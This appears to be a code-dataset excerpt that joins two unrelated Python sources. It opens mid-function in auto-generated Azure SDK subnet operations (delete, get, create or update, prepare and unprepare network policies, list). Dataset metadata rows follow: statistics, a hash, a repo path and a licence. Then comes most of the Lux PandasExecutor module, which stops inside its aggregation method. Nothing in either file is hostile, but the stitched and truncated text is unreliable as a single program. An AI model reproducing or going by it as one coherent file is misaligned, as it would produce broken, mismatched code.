resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified subnet.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param subnet_name: The name of the subnet.
:type subnet_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
subnet_name=subnet_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.Subnet"
"""Gets the specified subnet by virtual network and resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param subnet_name: The name of the subnet.
:type subnet_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Subnet, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_07_01.models.Subnet
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Subnet"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Subnet', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
subnet_parameters, # type: "_models.Subnet"
**kwargs # type: Any
):
# type: (...) -> "_models.Subnet"
cls = kwargs.pop('cls', None) # type: ClsType["_models.Subnet"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(subnet_parameters, 'Subnet')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Subnet', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('Subnet', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
subnet_parameters, # type: "_models.Subnet"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.Subnet"]
"""Creates or updates a subnet in the specified virtual network.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param subnet_name: The name of the subnet.
:type subnet_name: str
:param subnet_parameters: Parameters supplied to the create or update subnet operation.
:type subnet_parameters: ~azure.mgmt.network.v2020_07_01.models.Subnet
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either Subnet or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_07_01.models.Subnet]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Subnet"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
subnet_name=subnet_name,
subnet_parameters=subnet_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('Subnet', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}'} # type: ignore
def _prepare_network_policies_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
prepare_network_policies_request_parameters, # type: "_models.PrepareNetworkPoliciesRequest"
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._prepare_network_policies_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(prepare_network_policies_request_parameters, 'PrepareNetworkPoliciesRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_prepare_network_policies_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}/PrepareNetworkPolicies'} # type: ignore
def begin_prepare_network_policies(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
prepare_network_policies_request_parameters, # type: "_models.PrepareNetworkPoliciesRequest"
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Prepares a subnet by applying network intent policies.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param subnet_name: The name of the subnet.
:type subnet_name: str
:param prepare_network_policies_request_parameters: Parameters supplied to prepare subnet by
applying network intent policies.
:type prepare_network_policies_request_parameters: ~azure.mgmt.network.v2020_07_01.models.PrepareNetworkPoliciesRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._prepare_network_policies_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
subnet_name=subnet_name,
prepare_network_policies_request_parameters=prepare_network_policies_request_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_prepare_network_policies.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}/PrepareNetworkPolicies'} # type: ignore
def _unprepare_network_policies_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
unprepare_network_policies_request_parameters, # type: "_models.UnprepareNetworkPoliciesRequest"
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._unprepare_network_policies_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(unprepare_network_policies_request_parameters, 'UnprepareNetworkPoliciesRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_unprepare_network_policies_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}/UnprepareNetworkPolicies'} # type: ignore
def begin_unprepare_network_policies(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
unprepare_network_policies_request_parameters, # type: "_models.UnprepareNetworkPoliciesRequest"
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Unprepares a subnet by removing network intent policies.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param subnet_name: The name of the subnet.
:type subnet_name: str
:param unprepare_network_policies_request_parameters: Parameters supplied to unprepare subnet
to remove network intent policies.
:type unprepare_network_policies_request_parameters: ~azure.mgmt.network.v2020_07_01.models.UnprepareNetworkPoliciesRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._unprepare_network_policies_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
subnet_name=subnet_name,
unprepare_network_policies_request_parameters=unprepare_network_policies_request_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_unprepare_network_policies.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}/UnprepareNetworkPolicies'} # type: ignore
def list(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.SubnetListResult"]
"""Gets all subnets in a virtual network.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SubnetListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_07_01.models.SubnetListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SubnetListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('SubnetListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets'} # type: ignore
| 50.997151
| 255
| 0.66933
|
a73e607b5038ab37a293bdbff21d783ab8fde18b
| 22,975
|
py
|
Python
|
lux/executor/PandasExecutor.py
|
piyushg9794/lux
|
f5be470f5a4837db2746c950bebe2694665c25dc
|
[
"Apache-2.0"
] | null | null | null |
lux/executor/PandasExecutor.py
|
piyushg9794/lux
|
f5be470f5a4837db2746c950bebe2694665c25dc
|
[
"Apache-2.0"
] | null | null | null |
lux/executor/PandasExecutor.py
|
piyushg9794/lux
|
f5be470f5a4837db2746c950bebe2694665c25dc
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019-2020 The Lux Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pandas as pd
from lux.vis.VisList import VisList
from lux.vis.Vis import Vis
from lux.core.frame import LuxDataFrame
from lux.executor.Executor import Executor
from lux.utils import utils
from lux.utils.date_utils import is_datetime_series
from lux.utils.utils import check_import_lux_widget, check_if_id_like
from lux.utils.date_utils import is_datetime_series
import warnings
class PandasExecutor(Executor):
"""
Given a Vis objects with complete specifications, fetch and process data using Pandas dataframe operations.
"""
def __init__(self):
self.name = "PandasExecutor"
def __repr__(self):
return f"<PandasExecutor>"
@staticmethod
def execute_sampling(ldf: LuxDataFrame):
# General Sampling for entire dataframe
SAMPLE_START = 10000
SAMPLE_CAP = 30000
SAMPLE_FRAC = 0.75
if len(ldf) > SAMPLE_CAP:
if ldf._sampled is None: # memoize unfiltered sample df
ldf._sampled = ldf.sample(n=SAMPLE_CAP, random_state=1)
ldf._message.add_unique(
f"Large dataframe detected: Lux is only visualizing a random sample capped at {SAMPLE_CAP} rows.",
priority=99,
)
elif len(ldf) > SAMPLE_START:
if ldf._sampled is None: # memoize unfiltered sample df
ldf._sampled = ldf.sample(frac=SAMPLE_FRAC, random_state=1)
ldf._message.add_unique(
f"Large dataframe detected: Lux is only visualizing a random sample of {len(ldf._sampled)} rows.",
priority=99,
)
else:
ldf._sampled = ldf
@staticmethod
def execute(vislist: VisList, ldf: LuxDataFrame):
"""
Given a VisList, fetch the data required to render the vis.
1) Apply filters
2) Retrieve relevant attribute
3) Perform vis-related processing (aggregation, binning)
4) return a DataFrame with relevant results
Parameters
----------
vislist: list[lux.Vis]
vis list that contains lux.Vis objects for visualization.
ldf : lux.core.frame
LuxDataFrame with specified intent.
Returns
-------
None
"""
PandasExecutor.execute_sampling(ldf)
for vis in vislist:
# The vis data starts off being original or sampled dataframe
vis._vis_data = ldf._sampled
filter_executed = PandasExecutor.execute_filter(vis)
# Select relevant data based on attribute information
attributes = set([])
for clause in vis._inferred_intent:
if clause.attribute:
if clause.attribute != "Record":
attributes.add(clause.attribute)
# TODO: Add some type of cap size on Nrows ?
vis._vis_data = vis.data[list(attributes)]
if vis.mark == "bar" or vis.mark == "line":
PandasExecutor.execute_aggregate(vis, isFiltered=filter_executed)
elif vis.mark == "histogram":
PandasExecutor.execute_binning(vis)
elif vis.mark == "scatter":
HBIN_START = 5000
if len(ldf) > HBIN_START:
vis._postbin = True
ldf._message.add_unique(
f"Large scatterplots detected: Lux is automatically binning scatterplots to heatmaps.",
priority=98,
)
# vis._mark = "heatmap"
# PandasExecutor.execute_2D_binning(vis) # Lazy Evaluation (Early pruning based on interestingness)
@staticmethod
def execute_aggregate(vis: Vis, isFiltered=True):
"""
Aggregate data points on an axis for bar or line charts
Parameters
----------
vis: lux.Vis
lux.Vis object that represents a visualization
ldf : lux.core.frame
LuxDataFrame with specified intent.
Returns
-------
None
"""
import numpy as np
x_attr = vis.get_attr_by_channel("x")[0]
y_attr = vis.get_attr_by_channel("y")[0]
has_color = False
groupby_attr = ""
measure_attr = ""
if x_attr.aggregation is None or y_attr.aggregation is None:
return
if y_attr.aggregation != "":
groupby_attr = x_attr
measure_attr = y_attr
agg_func = y_attr.aggregation
if x_attr.aggregation != "":
groupby_attr = y_attr
measure_attr = x_attr
agg_func = x_attr.aggregation
if groupby_attr.attribute in vis.data.unique_values.keys():
attr_unique_vals = vis.data.unique_values[groupby_attr.attribute]
# checks if color is specified in the Vis
if len(vis.get_attr_by_channel("color")) == 1:
color_attr = vis.get_attr_by_channel("color")[0]
color_attr_vals = vis.data.unique_values[color_attr.attribute]
color_cardinality = len(color_attr_vals)
# NOTE: might want to have a check somewhere to not use categorical variables with greater than some number of categories as a Color variable----------------
has_color = True
else:
color_cardinality = 1
if measure_attr != "":
if measure_attr.attribute == "Record":
vis._vis_data = vis.data.reset_index()
# if color is specified, need to group by groupby_attr and color_attr
if has_color:
vis._vis_data = (
vis.data.groupby([groupby_attr.attribute, color_attr.attribute])
.count()
.reset_index()
)
vis._vis_data = vis.data.rename(columns={"index": "Record"})
vis._vis_data = vis.data[[groupby_attr.attribute, color_attr.attribute, "Record"]]
else:
vis._vis_data = vis.data.groupby(groupby_attr.attribute).count().reset_index()
vis._vis_data = vis.data.rename(columns={"index": "Record"})
vis._vis_data = vis.data[[groupby_attr.attribute, "Record"]]
else:
# if color is specified, need to group by groupby_attr and color_attr
if has_color:
groupby_result = vis.data.groupby([groupby_attr.attribute, color_attr.attribute])
else:
groupby_result = vis.data.groupby(groupby_attr.attribute)
groupby_result = groupby_result.agg(agg_func)
intermediate = groupby_result.reset_index()
vis._vis_data = intermediate.__finalize__(vis.data)
result_vals = list(vis.data[groupby_attr.attribute])
# create existing group by attribute combinations if color is specified
# this is needed to check what combinations of group_by_attr and color_attr values have a non-zero number of elements in them
if has_color:
res_color_combi_vals = []
result_color_vals = list(vis.data[color_attr.attribute])
for i in range(0, len(result_vals)):
res_color_combi_vals.append([result_vals[i], result_color_vals[i]])
# For filtered aggregation that have missing groupby-attribute values, set these aggregated value as 0, since no datapoints
if isFiltered or has_color and attr_unique_vals:
N_unique_vals = len(attr_unique_vals)
if len(result_vals) != N_unique_vals * color_cardinality:
columns = vis.data.columns
if has_color:
df = pd.DataFrame(
{
columns[0]: attr_unique_vals * color_cardinality,
columns[1]: pd.Series(color_attr_vals).repeat(N_unique_vals),
}
)
vis._vis_data = vis.data.merge(
df,
on=[columns[0], columns[1]],
how="right",
suffixes=["", "_right"],
)
for col in columns[2:]:
vis.data[col] = vis.data[col].fillna(0) # Triggers __setitem__
assert len(list(vis.data[groupby_attr.attribute])) == N_unique_vals * len(
color_attr_vals
), f"Aggregated data missing values compared to original range of values of `{groupby_attr.attribute, color_attr.attribute}`."
# Keep only the three relevant columns not the *_right columns resulting from merge
vis._vis_data = vis.data.iloc[:, :3]
else:
df = pd.DataFrame({columns[0]: attr_unique_vals})
vis._vis_data = vis.data.merge(
df, on=columns[0], how="right", suffixes=["", "_right"]
)
for col in columns[1:]:
vis.data[col] = vis.data[col].fillna(0)
assert (
len(list(vis.data[groupby_attr.attribute])) == N_unique_vals
), f"Aggregated data missing values compared to original range of values of `{groupby_attr.attribute}`."
